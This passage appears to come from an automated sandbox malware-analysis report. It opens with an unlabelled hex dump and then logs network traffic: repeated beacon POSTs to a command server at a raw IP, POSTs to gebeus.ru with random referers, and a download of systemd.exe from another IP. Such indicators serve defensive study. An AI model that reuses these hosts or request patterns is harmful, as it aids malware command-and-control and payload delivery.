41 43 46 57 50 4a 42 5a 4c 52 4d 48 57 51 4a 44 44 4f 44 47 59 42 4e 43 4d 4e 50 5a 56 5a 45 46 4f 55 4f 59 59 59 5a 53 54 5a 4b 4c 58 56 43 4e 58 57 50 42 4c 42 43 48 54 51 51 45 46 4f 49 4c 42 45 4a 50 4b 52 55 5a 4a 57 57 44 4e 4b 47 55 4e 41 41 44 57 5a 48 43 4f 55 52 46 46 5a 45 4a 43 50 42 47 49 4c 46 46 43 4e 56 54 41 4e 46 58 4c 57 58 51 44 59 4a 55 4c 48 45 55 51 47 4f 42 4e 55 5a 55 43 46 49 59 45 49 54 54 50 4b 45 5a 51 49 48 50 4f 4b 57 5a 44 4d 4d 53 55 42 49 51 58 48 55 57 42 42 45 47 47 52 47 51 50 43 4b 52 46 4d 41 46 4d 43 4b 42 4c 4e 50 58 55 58 43 43 58 51 44 48 51 58 50 4b 48 56 59 51 57 48 58 45 47 48 49 43 44 4f 5a 4a 55 43 4c 54 42 4b 4b 5a 4b 52 4b 4f 51 41 5a 57 58 48 4b 41 48 56 4b 44 4f 46 47 4b 54 49 51 48 45 47 43 4d 50 59 48 4b 4c 47 49 44 45 53 57 4e 41 56 41 53 46 55 43 4f 47 43 59 51 51 52 4c 57 51 49 57 44 46 46 43 51 59 48 59 48 4b 4b 50 49 42 4f 47 4f 4b 58 57 4f 5a 57 43 56 48 4b 4d 47 54 58 46 58 41 4b 59 59 42 5a 51 47 5a 57 53 4d 46 49 43 4a 52 58 47 44 4c 4a 41 48 50 53 54 4d 50 49 41 58 52 5a 4e 4d 4a 42 48 4a 46 56 5a 4f 57 44 4b 4f 4b 50 44 51 52 4b 49 52 41 52 4a 45 4a 4d 4e 50 43 53 45 57 55 46 48 4b 4c 45 4c 50 5a 57 43 4d 57 4c 5a 54 5a 42 46 57 4a 54 49 42 58 41 5a 42 54 54 4a 4f 45 47 48 43 4c 58 55 5a 59 42 59 47 59 55 4c 46 47 4a 50 4c 55 4e 56 4a 43 54 44 4b 56 55 48 4b 46 43 4d 43 45 53 57 58 4d 44 4c 5a 51 4b 44 55 57 54 41 45 43 52 44 42 57 45 43 58 50 43 48 50 42 43 45 52 44 41 4a 4f 47 46 43 4
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=1
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=2
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=3
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=4
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=5
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=6
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=7
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=8
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 58Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=9
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=10
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=11
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=12
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=13
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=14
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=15
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=16
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=17
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=18
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=19
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=20
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=21
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=22
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=23
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=24
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=25
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=26
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=27
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=28
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=29
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=30
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=31
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=32
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=33
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=34
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=35
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=36
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=37
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=38
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=39
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=40
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=41
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=42
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=43
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=44
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=45
      Source: global trafficHTTP traffic detected: POST /getcommands HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.246.96.149Content-Length: 59Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=46
      Source: Joe Sandbox ViewIP Address: 77.221.157.163 77.221.157.163
      Source: Joe Sandbox ViewIP Address: 58.151.148.90 58.151.148.90
      Source: Joe Sandbox ViewASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
      Source: Joe Sandbox ViewASN Name: TelconetSAEC TelconetSAEC
      Source: Joe Sandbox ViewASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
      Source: Joe Sandbox ViewASN Name: PORTLANEwwwportlanecomSE PORTLANEwwwportlanecomSE
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global trafficHTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qydxnaxywntsme.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doqnumhybayljg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pqbpwctaxuyno.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ktdmwvwgrxicbyf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjvjtoqsxecwt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikgaobomjngh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dshprjrooia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gejkxdmasvmxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqchsaraxkauihtq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: gebeus.ru
      Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxmmgqbcaaod.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xlokwbpjnmjelwgt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ndqtpbgfxigpiob.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: gebeus.ru
